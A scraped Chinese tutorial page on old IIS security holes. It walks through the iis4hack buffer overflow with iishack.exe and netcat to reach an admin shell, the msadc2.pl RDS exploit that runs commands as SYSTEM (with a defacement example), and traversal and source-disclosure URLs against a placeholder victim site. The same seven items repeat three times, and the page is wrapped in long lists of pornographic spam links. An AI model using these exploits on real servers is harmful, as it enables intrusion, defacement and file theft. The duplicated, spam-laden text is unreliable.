一起草最新网址_日韩一区二区麻豆国产_91视频婷婷_日本一区二区视频在线_日韩激情一区二区三区_国产另类第一区_成人免费在线播放视频_亚洲永久精品ww.7491进入_久久这里有精品视频_久久精品一级片_日韩av在线网页_波多野结衣不卡视频

IIS的十七個常見安全漏洞_Web服務器教程

編輯Tag賺U幣
教程Tag:暫無Tag,歡迎添加,賺取U幣!

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的Web服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來連接你要檢測的服務器:

c:>nc 80

如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

2.msadc

IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的Web服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來連接你要檢測的服務器:

c:>nc 80

如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

2.msadc

IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容,你可以請求如下的URL: http://www.victim.com/default.asp::$DATA你就得到了源代碼

1. iis4hack緩沖溢出

主要存在于.htr,.idc和.stm文件中,其對關于這些文件的URL請求沒有對名字進行充分的邊界檢查,導致運行攻擊者插入一些后門程序 在系統中下載和執行程序。要檢測這樣的站點你需要兩個文件iishack.exe,ncx.exe,你可以到下面 的站點www.technotronic.com去下載,另外你還需要一臺自己的WEB服務器。你現在你自己的Web服務器上運行WEB服務程序并把ncx.exe放到你自己相應的目錄下,然后使用iishack.exe來檢查目標機器:

c:>iishack.exe 80 /ncx.exe

然后你就使用netcat來連接你要檢測的服務器:

c:>nc 80

如果溢出點正確你就可以看到目標機器的命令行提示,并且是管理遠權限。利用程序見iis4hack.zip

2.msadc

IIS的MDAC組件存在一個漏洞可以導致攻擊者遠程執行你系統的命令。主要核心問題是存在于RDS Datafactory,默認情況下, 它允許遠程命令發送到IIS服務器中,這命令會以設備用戶的身份運行,其一般默認情況下是SYSTEM用戶。利用程序為msadc2.pl,我們看看它的help

[quack@chat quack]$ perl msadc2.pl -h

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Usage: msadc.pl -h { -d -X -v }

-h = host you want to scan (ip or domain)

-d = delay between calls, default 1 second

-X = dump Index Server path table, if available

-N = query VbBusObj for NetBIOS name

-V = use VbBusObj instead of ActiveDataFactory

-v = verbose

-e = external dictionary file for step 5

-u <\hostsharefile> = use UNC file

-w = Windows 95 instead of Windows NT

-c = v1 compatibility (three step query)

-s = run only step

Or a -R will resume a (v2) command session

[quack@chat quack]$ perl msadc2.pl -hhttp://www.targe.com/

-- RDS smack v2 - rain forest puppy / ADM / wiretrip --

Type the command line you want to run (cmd /c assumed):

cmd /c

如果出現cmd /c后,直接鍵入命令行,就可以以system權限執行命令了。比如xundi教的:

echo hacked by me > d:inetpubwwwrootvictimwebindex.htm

3.Codebrws.asp

察看文件源代碼

http://www.victim.com/iisamples/exair/howitworks/codebrws.asp?source=/iisamples/exair/howitworks/codebrws.asp

4.Showcode.asp

察看文件源代碼

http://www.victim.com/msadc/samples/selector/showcode.asp?source=/msadc/../../../../../winnt/win.ini

5.Null.htw

察看文件源代碼

http://www.victim.com/null.htw?CiWebhitsfile=/default.asp%20&%20CiRestriction=none%20&%20&CiHiliteType=full

6.webhits.dll & .htw

hit-highligting功能是由Index Server提供的允許一個WEB用戶在文檔上highlighted(突出)他們原始搜索的條目,這個文檔的名字通過變量CiWebhitsfile傳遞給.htw文件,Webhits.dll是一個ISAPI應用程序 來處理請求,打開文件并返回結果,當用戶控制了CiWebhitsfile參數傳遞給.htw時,他們就可以請求任意文件,結果就是導致查看ASP源碼和其他腳本文件內容。要了解你是否存在這個漏洞,你可以請求如下條目:

http://www.victim.com/nosuchfile.htw 如果你從服務器端獲得如下信息:

format of the QUERY_STRING is invalid這就表示你存在這個漏洞 .這個問題主要就是webhits.dll關聯了.htw文件的映射,所以你只要取消

這個映射就能避免這個漏洞,你可以在你認為有漏洞的系統中搜索.htw文件,一般會發現如下的程序:

/iissamples/issamples/oop/qfullhit.htw

/iissamples/issamples/oop/qsumrhit.htw

/isssamples/exair/search/qfullhit.htw

/isssamples/exair/search/qsumrhit.htw

/isshelp/iss/misc/iirturnh.htw (這個一般為loopback使用)

一個攻擊者可以使用如下的方法來訪問系統中文件的內容:

http://www.victim.com/iissamples/issamples/oop/qfullhit.htw?

ciwebhitsfile=/../../winnt/win.ini&cirestriction=none&cihilitetype=full

就會在有此漏洞系統中win.ini文件的內容。 7.ASP Alternate Data Streams(::$DATA) 要查看一些.asp文件的內容

來源:網絡搜集//所屬分類:Web服務器教程/更新時間:2012-07-24
相關Web服務器教程
日本成人免费在线| 国产 日韩 欧美在线| 国产一区二区三区中文字幕| 亚洲精品中字| 精品视频在线免费看| 中文字幕在线观看你懂的| 日韩精品一区二区三区外面| www.天天干.com| 国产亚洲精品美女久久久m| 午夜精品福利一区二区三区av| 国产无遮挡又黄又爽| 欧美写真视频网站| 亚洲最大的黄色网址| 亚洲精品美女久久久久| 日韩av高清在线观看| 日本三级免费观看| 俺去亚洲欧洲欧美日韩| 91丨九色丨黑人外教| 黄色小网站91| 亚洲成人自拍一区| 精品国产一级片| 国产成年人视频网站| 日本久久久久久久久久久| 精品欧美一区二区精品久久| 美女视频黄a大片欧美| 在线观看你懂的视频| 国产精品久久久| 91福利视频久久久久| 久久久青草婷婷精品综合日韩| 在线播放国产视频| 99在线首页视频| 精品国产一区二区三区久久久蜜月| 美女又爽又黄免费视频| 一区二区精品在线观看| 久久精品视频在线| 不卡大黄网站免费看| 天堂久久精品忘忧草| 午夜午夜精品一区二区三区文| 欧美日韩国产不卡| 从欧美一区二区三区| 国产午夜免费视频| 久久久精品999| 四虎精品一区二区三区| 色哟哟精品观看| 亚洲一区二区在线看| 久久99亚洲精品| 色婷婷av一区二区三区gif| 欧美一区二区三区成人片在线| 香蕉视频黄色在线观看| 日韩精品成人一区二区在线观看| 欧美精品一区二区久久婷婷| 久久久久高清精品| 欧美日韩综合在线观看| 黄色国产一级视频| 亚洲xxxx18| 久久精品成人欧美大片| 欧美日韩成人激情| 美女任你摸久久 | 久久电影网电视剧免费观看| 久久黄色免费视频| 黄色性视频网站| 久久久亚洲精品无码| 国产精品久久久久免费 | 久久综合九色综合久久久精品综合| 91精品中文字幕| 成年人免费视频播放| 亚洲午夜激情影院| 999久久欧美人妻一区二区| 91中文字幕一区| 欧美日韩成人免费| 亚洲欧美激情在线视频| 欧美性大战久久久| 亚洲国产精品t66y| 国产一区欧美一区| 性xxxx搡xxxxx搡欧美| 国产欧美日本在线| 国产有码一区二区| 久久久久久有精品国产| 日韩成人在线播放| 欧美精品第1页| 色综合天天综合网国产成人综合天| 久久久久国产免费免费| 视频二区在线观看| 亚洲第一天堂久久| 欧美日韩一道本| 天天爱天天做天天操| 麻豆成人在线播放| 成人午夜电影在线播放| 国产精品久久一区主播| 国内外成人免费激情在线视频网站| 国产亚洲激情在线| 亚洲乱码av中文一区二区| 欧美啪啪小视频| 国产无遮挡一区二区三区毛片日本| caoporn91| 欧美老熟妇乱大交xxxxx| 少妇熟女视频一区二区三区| 男人午夜视频在线观看| 香蕉视频网站入口| 草草久久久无码国产专区| 中文字幕国产一区| 奇米888四色在线精品| 国产91国语对白在线| 欧美 日韩 国产 成人 在线观看| 农民人伦一区二区三区| 444亚洲人体| 亚洲最大成人在线| 97成人超碰免| 国产mv久久久| 清纯唯美亚洲激情| 欧美另类高清videos| 欧美精品制服第一页| 久久久成人精品视频| 久热精品视频在线免费观看| 久久精品久久久久久| 久久久精品蜜桃| 麻豆久久久久久| 国产精品99久| 国产精品区一区二区三区| 中文字幕色av一区二区三区| 91农村精品一区二区在线| 久久久久久电影| 国产日韩v精品一区二区| 亚洲视频在线一区二区| 亚洲午夜羞羞片| 91久久国产最好的精华液| 欧美巨大另类极品videosbest | 亚洲美女淫视频| 欧美视频第二页| 精品无人国产偷自产在线| 久久精品人人爽| 欧美做受高潮电影o| 国产日韩欧美一区二区| 午夜啪啪福利视频| 日韩在线观看免费网站| 久久精品视频在线| 国产欧美日韩中文| 日韩欧美亚洲精品| 凹凸国产熟女精品视频| 欧美日韩一区二区三区四区五区六区| 一级特黄曰皮片视频| 国产极品在线播放| 天天操天天干天天干| 国产盗摄视频一区二区三区| 中文字幕在线不卡视频| 色综合一个色综合| 在线丨暗呦小u女国产精品| 国产精品高潮呻吟视频| 色大师av一区二区三区| 尤物网站在线看| 国产一级二级毛片| 久久久久久自在自线| 亚洲色图在线播放| 欧美成人在线直播| 国产成人精品av在线| 精品国产无码在线| 成人三级视频在线观看一区二区| 91最新在线免费观看| 中国丰满人妻videoshd | 久久久精品毛片| 国产一区美女在线| 都市激情亚洲色图| 色综合伊人色综合网| 国产在线一区二| 中文字幕永久有效| 一级黄色在线观看| fc2成人免费视频| 国产深夜男女无套内射| 女人十八毛片嫩草av| 亚洲精品久久久久久久久久久久久久| 播五月开心婷婷综合| 欧美一级在线观看| 91精品国产综合久久香蕉最新版| 欧美 日韩 国产 高清| 激情五月婷婷在线| 精品影视av免费| 婷婷久久久久久| 99视频在线精品| 精品国产91乱码一区二区三区| 国产日韩在线精品av| 久久国产激情视频| 久久精品欧美一区二区| 国产成人精品综合在线观看| 日韩欧美亚洲一区二区| 国产在线视频91| 深夜视频在线观看| 无码精品在线观看| 欧美日韩极品在线观看一区| 成人做爽爽免费视频| 亚洲三级在线视频| 色窝窝无码一区二区三区成人网站 | 日韩精品一区第一页| 欧美久久久久中文字幕| 91pron在线| www.久久av| 不卡一区二区三区四区| 日韩av网站在线| 老司机午夜网站| 日韩av电影网| 日本成人一级片| 不卡av在线免费观看| 久久九九国产精品怡红院| 国产91av视频在线观看| 少妇一级淫片免费放中国| 亚洲欧美日韩国产另类专区| 国产精品久久久久久久午夜| 先锋资源在线视频| 国产综合成人久久大片91| 亚洲色图13p| 可以在线看的av网站| 99国产在线播放| 欧美一区二区三区四区在线观看| 乱色588欧美| 亚洲不卡在线视频| 欧美三级视频在线播放| 午夜精品亚洲一区二区三区嫩草| 日操夜操天天操| 在线观看一区二区精品视频| 国内精品久久国产| 久久精品视频8| 国产精品欧美极品| 成人乱色短篇合集| 久久久久亚洲AV| 亚洲国产成人va在线观看天堂| 日本国产精品视频| 免费黄在线观看| 成人小视频在线| 2020欧美日韩在线视频| 波多野结衣一本| 一区二区三区日韩在线观看| 一区二区三区四区国产| 久久久久久久久国产精品| 黄色小视频大全| 亚洲天堂网在线观看视频| 欧美xxxxxxxxx| 欧洲精品一区二区| 久久亚洲a v| 久久er99精品| 日韩暖暖在线视频| 国产a视频免费观看| 性插视频在线观看| 色在人av网站天堂精品| 欧美熟妇激情一区二区三区| 亚洲国产aⅴ成人精品无吗| 亚洲国产欧美日韩| 成人av在线播放网站| 青草青草久热精品视频在线网站 | 四虎成人在线播放| 亚洲女人的天堂| 日本免费在线视频观看| 国产曰批免费观看久久久| 国产欧美一区二区三区久久人妖| 国产伦精品一区二区三区视频我| 精品粉嫩aⅴ一区二区三区四区| 在线视频日韩欧美| 亚洲三级在线播放| 91亚洲精品国产| 26uuu色噜噜精品一区| 日本高清一区| 成人精品国产免费网站| 久久久久久国产精品免费免费| 天天躁日日躁狠狠躁喷水| 国产成人精品久久亚洲高清不卡| 中文字幕 视频一区| 久久久久久免费精品| 免费视频网站在线观看入口| 日韩一中文字幕| 国产网友自拍视频| 日韩在线观看免费av| 好吊操这里只有精品| 在线播放国产精品| 日本熟女一区二区| 欧美肥老妇视频| 一级黄色a毛片| 国产精品伦子伦免费视频| 少妇喷水在线观看| 粉嫩av一区二区三区免费观看| 日本免费新一区视频| 久久艳妇乳肉豪妇荡乳av| 国产成人精品免费在线| 在线无限看免费粉色视频| 国产三级一区二区| 北条麻妃视频在线| 欧美亚洲国产一区二区三区| www.久久av| 亚洲人成网站免费播放| 国产无套粉嫩白浆内谢| 欧美极品在线视频| 中文字幕二区三区| 91久久大香伊蕉在人线| 成人h版在线观看| 国产手机免费视频| 欧美在线观看你懂的| 精品黑人一区二区三区观看时间| 精品视频在线播放色网色视频| 欧美日韩综合在线观看| 国产精品久久二区| 国产999精品久久| 久久九九国产视频| 日韩精品一区二区三区中文不卡| 久久久久亚洲av无码专区| 国产精品久久久久国产a级| 国产麻豆视频一区二区| www国产黄色| 911精品国产一区二区在线| 久久久久久久久久久久国产| 国产91色在线播放| 成人av电影在线| www.cao超碰| 久久精品国亚洲| 国产一区二区在线影院| 日本国产在线播放| 精品久久国产字幕高潮| 国产一区二区三区三州| 日韩亚洲视频| 欧美撒尿777hd撒尿| 中国一级特黄视频| 在线免费观看成人| 欧美精品自拍偷拍动漫精品| 无码人妻精品一区二区三区9厂 | 漂亮人妻被黑人久久精品| 久久久久999| 高清不卡一二三区| 日韩av一二区| 国产精品美女视频网站| 中文字幕中文字幕在线一区| www久久久久久久| 成人午夜高潮视频| 一区二区三区高清不卡| 欧美精品久久一区二区三区| 亚洲欧美一二三区| 日韩精品无码一区二区三区| 欧美日韩一区二区在线视频| 久久精品无码av| 中文字幕中文字幕一区三区| 日韩精品一区二| 国产成人亚洲综合青青| 五月婷婷六月丁香综合| 成年人在线观看视频免费| 久久伊人精品一区二区三区| 成人激情黄色小说| 国产黄色录像视频| 久久久久久久久久久一区| 欧美一级国产精品| 蜜桃久久av一区| 日韩中文在线视频| 成人精品在线播放| 五月天激情播播| 国产999精品| 午夜精品福利视频网站| 国产精品高潮呻吟AV无码| 浮妇高潮喷白浆视频| 97香蕉超级碰碰久久免费软件| 亚洲女人的天堂| 亚洲国产精彩视频| 色婷婷国产精品综合在线观看| 亚洲AV无码成人精品区东京热| 男人日女人视频网站| 91chinesevideo永久地址| 亚洲精品视频在线观看免费| 97人妻精品视频一区| 国产日韩一区二区在线观看| 国产成人精品999| 欧美性色黄大片| 久久综合综合久久综合| 精品视频第一页| 日韩极品视频在线观看| 欧美中文在线字幕| 欧美疯狂性受xxxxx喷水图片| 国产精品一二三四| 天天操天天摸天天干| wwwwwxxxx日本| 久久久水蜜桃| 欧美成人精品在线视频| 黑人狂躁日本妞一区二区三区 | 午夜激情综合网| 久久精品72免费观看| 精品在线免费观看视频| 国产又猛又黄的视频| 国产欧美日韩一区| 欧美猛交免费看| 欧美日韩一二三区| 欧美国产激情一区二区三区蜜月| 国产精选久久久| 欧美 日韩 国产 成人 在线观看| 精品一二三四五区| 亚洲综合社区网| 欧美成人四级hd版| 日韩午夜激情视频| 亚洲免费av观看| 久久黄色级2电影| 青娱乐在线免费视频| a资源在线观看| 欧美丝袜在线观看| 人妻激情另类乱人伦人妻| 91在线精品播放| 久久天堂av综合合色| 精品国产免费视频| 精品久久久久久电影| 国产日韩欧美综合在线| 全部av―极品视觉盛宴亚洲| 中文字幕观看视频| 日本a级片视频| 亚洲午夜福利在线观看| 久久久久久三级| 欧美黄色免费网址| 亚洲三区在线| 欧美日韩高清免费| 91在线免费看片| 国产精品久久久久7777婷婷|